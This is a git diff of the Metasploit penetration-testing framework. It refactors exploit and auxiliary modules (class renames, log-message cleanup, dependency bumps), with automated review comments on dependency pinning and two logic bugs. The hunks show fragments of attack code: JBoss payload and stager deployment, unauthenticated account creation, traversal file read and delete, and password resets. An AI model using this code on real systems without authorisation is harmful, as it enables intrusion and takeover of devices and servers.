'metasploit-model', '1.1.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.0.22' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.6' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. 
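Review bot: This hunk drops the version constraint on `metasploit-concern` (`'1.0.0'` becomes no constraint) while the neighbouring metasploit-* gems stay pinned to exact versions, so an install without a lockfile resolves whatever release is newest at that moment. The later hunk `@@ -89,6 +89,11 @@` does the same for the new `octokit` and `redcarpet` entries and leaves `patch_finder` open-ended with `'>= 1.0.2'`. For a tool installed on operator machines, unpinned runtime dependencies widen the supply-chain exposure and make builds non-reproducible. Unless a Gemfile.lock accompanies every install path, a bounded constraint such as `spec.add_runtime_dependency 'metasploit-concern', '~> 1.0'` is safer. The gems commented as "Needed for documentation generation" might also fit `add_development_dependency` if nothing loads them at runtime.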
@@ -89,6 +89,11 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'recog', '2.0.14' # required for bitlocker fvek extraction spec.add_runtime_dependency 'openssl-ccm', '1.2.1' + # Needed for documentation generation + spec.add_runtime_dependency 'octokit' + spec.add_runtime_dependency 'redcarpet' + # Needed for Microsoft patch finding tool (msu_finder) + spec.add_runtime_dependency 'patch_finder', '>= 1.0.2' # rb-readline doesn't work with Ruby Installer due to error with Fiddle: # NoMethodError undefined method `dlopen' for Fiddle:Module diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index ee2572bebb..22b3306bdf 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb index d3aed5b3dc..a240380762 100644 --- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb +++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/appletv/appletv_display_image.rb b/modules/auxiliary/admin/appletv/appletv_display_image.rb index 5b009c7889..7d2a259628 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_image.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_image.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/auxiliary/admin/appletv/appletv_display_video.rb b/modules/auxiliary/admin/appletv/appletv_display_video.rb index ff0370dc4a..c6a2d3d7f8 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_video.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_video.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/atg/atg_client.rb b/modules/auxiliary/admin/atg/atg_client.rb index 5560f2f76d..00af98129b 100644 --- a/modules/auxiliary/admin/atg/atg_client.rb +++ b/modules/auxiliary/admin/atg/atg_client.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner @@ -225,9 +225,9 @@ class Metasploit3 < Msf::Auxiliary when 'SET_TANK_NAME' # send the set tank name command to change the tank name(s) if tank_number == 0 - vprint_status("#{peer} -- setting all tank names to #{tank_name}") + vprint_status("Setting all tank names to #{tank_name}") else - vprint_status("#{peer} -- setting tank ##{tank_number}'s name to #{tank_name}") + vprint_status("Setting tank ##{tank_number}'s name to #{tank_name}") end request = "#{action.opts[protocol_opt_name]}#{format('%02d', tank_number)}#{tank_name}\n" sock.put(request) @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # send an inventory probe to show that it succeeded inventory_probe = "#{actions.find { |a| a.name == 'INVENTORY' }.opts[protocol_opt_name]}\n" inventory_response = get_response(inventory_probe) - message = "#{peer} #{protocol} #{action.opts['Description']}:\n#{inventory_response}" + message = "#{protocol} #{action.opts['Description']}:\n#{inventory_response}" if inventory_response.include?(tank_name) print_good message else 
@@ -245,7 +245,7 @@ class Metasploit3 < Msf::Auxiliary end else response = get_response("#{action.opts[protocol_opt_name]}\n") - print_good("#{peer} #{protocol} #{action.opts['Description']}:\n#{response}") + print_good("#{protocol} #{action.opts['Description']}:\n#{response}") end ensure disconnect diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 7f76f33d07..2348397fe4 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::NDMP diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 171d2d7a04..6cef2bf11d 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include ::Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/chromecast/chromecast_reset.rb b/modules/auxiliary/admin/chromecast/chromecast_reset.rb index cd245599e9..123faba0f9 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_reset.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb index 5263d13b1f..e11ac04cc8 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index 6d93c9e626..2f574d8494 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index c706eea4f0..43b4479c0b 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb index 6f8d5738fb..c712a12ebf 100644 --- a/modules/auxiliary/admin/db2/db2rcmd.rb +++ b/modules/auxiliary/admin/db2/db2rcmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index ce62291515..f6dc37ff67 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb index 9fbc5aff7d..462536d3ff 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb 
+++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index e2970315f0..df41d4d671 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index 1c54a65368..881f0d5e75 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/firetv/firetv_youtube.rb b/modules/auxiliary/admin/firetv/firetv_youtube.rb index ffeedd5885..8fec58c5e0 100644 --- a/modules/auxiliary/admin/firetv/firetv_youtube.rb +++ b/modules/auxiliary/admin/firetv/firetv_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index 1c99844b0f..0b1ef1ba24 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp 
diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb index 1941291594..272e9f4d82 100644 --- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb +++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -99,21 +99,21 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Trying to find the service desk service strong name...") + print_status("Trying to find the service desk service strong name...") service_desk = get_service_desk_strong_name if service_desk.nil? - print_error("#{peer} - service desk service not found.") + print_error("service desk service not found.") return end - print_good("#{peer} - service desk strong number found: #{service_desk}") + print_good("service desk strong number found: #{service_desk}") - print_status("#{peer} - Trying to find the AccountService strong name...") + print_status("Trying to find the AccountService strong name...") account_service = get_account_service_strong_name(service_desk) if account_service.nil? - print_error("#{peer} - AccountService service not found.") + print_error("AccountService service not found.") return end - print_good("#{peer} - AccountService strong number found: #{account_service}") + print_good("AccountService strong number found: #{account_service}") header= "6|0|39" # version | unknown | string_table size 
@@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary service_url = ssl ? "https://" : "http://" service_url << "#{rhost}:#{rport}/servicedesk/servicedesk/" - print_status("#{peer} - Trying to create account #{datastore["USERNAME"]}...") + print_status("Trying to create account #{datastore["USERNAME"]}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("servicedesk", "servicedesk", "accountSerivce.gwtsvc"), @@ -247,12 +247,12 @@ class Metasploit3 < Msf::Auxiliary }) unless res and res.code == 200 - print_error("#{peer} - Unknown error while creating the user.") + print_error("Unknown error while creating the user.") return end if res.body =~ /Username.*already exists/ - print_error("#{peer} - The user #{datastore["USERNAME"]} already exists.") + print_error("The user #{datastore["USERNAME"]} already exists.") return elsif res.body =~ /Account.*added successfully/ login_url = ssl ? "https://" : "http://" @@ -267,8 +267,8 @@ class Metasploit3 < Msf::Auxiliary proof: "#{login_url}\n#{res.body}" ) - print_good("#{peer} - Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") - print_status("#{peer} - Use it to log into #{login_url}") + print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") + print_status("Use it to log into #{login_url}") end end diff --git a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb index 55f85637ae..035c3ae179 100644 --- a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb +++ b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 7b4925a4ca..7a08a1366d 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary @traversal.gsub!(/\//, "\\") file.gsub!(/\//, "\\") else # unix - print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows") + print_error("*nix platform detected, vulnerability is only known to work on Windows") return end @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { 
@@ -119,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /View Log Files/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end def get_platform - print_status("#{peer} - Retrieving platform") + print_status("Retrieving platform") res = send_request_cgi( { @@ -140,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 if res.body =~ /Windows/ - print_good("#{peer} - Windows platform found") + print_good("Windows platform found") return 'windows' elsif res.body =~ /Linux/ - print_good("#{peer} - Linux platform found") + print_good("Linux platform found") return 'unix' end end - print_warning("#{peer} - Platform not found, assuming UNIX flavor") + print_warning("Platform not found, assuming UNIX flavor") return 'unix' end diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index 9d89a5b782..29706ecd39 100644 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -8,7 +8,7 @@ require 'bcrypt' require 'digest' require 'openssl' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index 725f125d26..a61bc6e376 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner 
diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index cc807330d1..c69c44eb88 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index e7e9f7de48..d47959957a 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb index cb17b5cc91..b1870cd699 100644 --- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb index 0fb48eb584..b4f8b16898 100644 --- a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 5a1fcb3cd2..0889e7a690 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index 4601c36955..2cf37c785d 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -77,16 +77,16 @@ class Metasploit3 < Msf::Auxiliary def run if not has_auth - print_error("#{peer} - No basic authentication enabled") + print_error("No basic authentication enabled") return end bypass_string = try_auth if bypass_string.empty? - print_error("#{peer} - The bypass attempt did not work") + print_error("The bypass attempt did not work") else - print_good("#{peer} - You can bypass auth by doing: #{bypass_string}") + print_good("You can bypass auth by doing: #{bypass_string}") end end diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 335c0e050d..18de11b8c8 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient 
@@ -52,17 +52,17 @@ class Metasploit3 < Msf::Auxiliary }) if (res and (m = res.headers['Server'].match(/Boa\/(.*)/))) - vprint_status("#{peer} - Boa Version Detected: #{m[1]}") + vprint_status("Boa Version Detected: #{m[1]}") return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version return Exploit::CheckCode::Safe if (m[1][3].ord-48>4) return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Not a Boa Server!") + vprint_status("Not a Boa Server!") return Exploit::CheckCode::Safe # not a boa server end rescue Rex::ConnectionRefused - print_error("#{peer} - Connection refused by server.") + print_error("Connection refused by server.") return Exploit::CheckCode::Safe end end @@ -80,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - The server may be down") + print_error("The server may be down") return elsif res and res.code != 401 - print_status("#{peer} - #{uri} does not have basic authentication enabled") + print_status("#{uri} does not have basic authentication enabled") return end - print_status("#{peer} - Server still operational. Checking to see if password has been overwritten") + print_status("Server still operational. Checking to see if password has been overwritten") res = send_request_cgi({ 'uri' => uri, 'method'=> 'GET', 
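Review bot: In the `@@ -52,17` hunk of intersil_pass_reset.rb, `res.headers['Server'].match(...)` would raise NoMethodError when the response has no Server header, and the only rescue visible here is for `Rex::ConnectionRefused`. Guarding the lookup, `if res && (m = res.headers['Server'].to_s.match(/Boa\/(.*)/))`, lets a header-less response fall through to the existing "Not a Boa Server!" branch. The two `m[1][n].ord-48` comparisons index fixed character positions of the version string, so a short comment naming the version range they are meant to exclude would make the check reviewable. The method starts above the hunk, so the request options are not visible from here.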
@@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Server timedout, will not continue") + print_error("Server timedout, will not continue") return end case res.code when 200 - print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}") + print_good("Password reset successful with admin:#{datastore['PASSWORD']}") when 401 - print_error("#{peer} - Access forbidden. The password reset attempt did not work") + print_error("Access forbidden. The password reset attempt did not work") else - print_status("#{peer} - Unexpected response: Code #{res.code} encountered") + print_status("Unexpected response: Code #{res.code} encountered") end end diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index e3b3932032..1553569111 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/jboss_bshdeployer.rb b/modules/auxiliary/admin/http/jboss_bshdeployer.rb index 63883fbf56..0dfad0849f 100644 --- a/modules/auxiliary/admin/http/jboss_bshdeployer.rb +++ b/modules/auxiliary/admin/http/jboss_bshdeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss 
@@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '') if http_verb == 'POST' - print_status("#{peer} - Deploying payload...") + print_status("Deploying payload...") opts = { :file => "#{app_base}.war", :contents => encoded_payload } else - print_status("#{peer} - Deploying stager...") + print_status("Deploying stager...") stager_name = Rex::Text.rand_text_alpha(8 + rand(8)) stager_contents = stager_jsp(app_base) opts = { @@ -69,37 +69,37 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(bsh_payload) if package.nil? - print_error("#{peer} - Deployment failed") + print_error("Deployment failed") return else - print_good("#{peer} - Deployment successful") + print_good("Deployment successful") end unless http_verb == 'POST' # call the stager to deploy our real payload war stager_uri = '/' + stager_name + '/' + stager_name + '.jsp' payload_data = "#{Rex::Text.rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}" - print_status("#{peer} - Calling stager #{stager_uri} to deploy final payload...") + print_status("Calling stager #{stager_uri} to deploy final payload...") res = deploy('method' => 'POST', 'data' => payload_data, 'uri' => stager_uri) if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Remove the stager - print_status("#{peer} - Removing stager...") + print_status("Removing stager...") files = {} files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp" files[:stager_base] = "#{stager_name}.war" delete_script = generate_bsh(:delete, files) res = deploy_package(delete_script, package) if res.nil? - print_error("#{peer} - Unable to remove Stager") + print_error("Unable to remove Stager") else - print_good("#{peer} - Stager successfully removed") + print_good("Stager successfully removed") end end 
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary def undeploy_action(app_base) # Undeploy the WAR and the stager if needed - print_status("#{peer} - Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") + print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") files = {} files[:app_base] = "#{app_base}.war" @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(delete_script) if package.nil? - print_error("#{peer} - Unable to remove WAR") + print_error("Unable to remove WAR") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb index 64cbb4fa8b..03f6ee6c75 100644 --- a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb +++ b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss @@ -51,10 +51,10 @@ class Metasploit3 < Msf::Auxiliary stager_contents = stager_jsp_with_payload(app_base, encoded_payload) if http_verb == 'POST' - print_status("#{peer} - Deploying stager for the WAR file...") + print_status("Deploying stager for the WAR file...") res = upload_file(stager_base, stager_jsp_name, stager_contents) else - print_status("#{peer} - Deploying minimal stager to upload the payload...") + print_status("Deploying minimal stager to upload the payload...") head_stager_jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) head_stager_contents = head_stager_jsp(stager_base, stager_jsp_name) head_stager_uri = "/" + stager_base + "/" + head_stager_jsp_name + ".jsp" 
@@ -79,20 +79,20 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, "Failed to deploy") end - print_status("#{peer} - Calling stager to deploy the payload warfile (might take some time)") + print_status("Calling stager to deploy the payload warfile (might take some time)") stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp' stager_res = deploy('uri' => stager_uri, 'method' => 'GET') if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Cleaning stagers - print_status("#{peer} - Undeploying stagers via DeploymentFileRepository.remove()...") - print_status("#{peer} - This might take some time, be patient...") if http_verb == "HEAD" + print_status("Undeploying stagers via DeploymentFileRepository.remove()...") + print_status("This might take some time, be patient...") if http_verb == "HEAD" delete_res = [] if head_stager_jsp_name delete_res << delete_file(stager_base + '.war', head_stager_jsp_name, '.jsp') 
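Review bot: The success check after the stager call tests `res`, not the `stager_res` assigned on the line above it, so "Payload deployed" reflects the earlier upload response rather than the stager request. As written, a failed or unanswered stager call can still be reported as a successful deployment. The condition should read `if stager_res && stager_res.code == 200`. The method starts and ends outside this hunk, so whether `res` is reused further down is not visible here.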
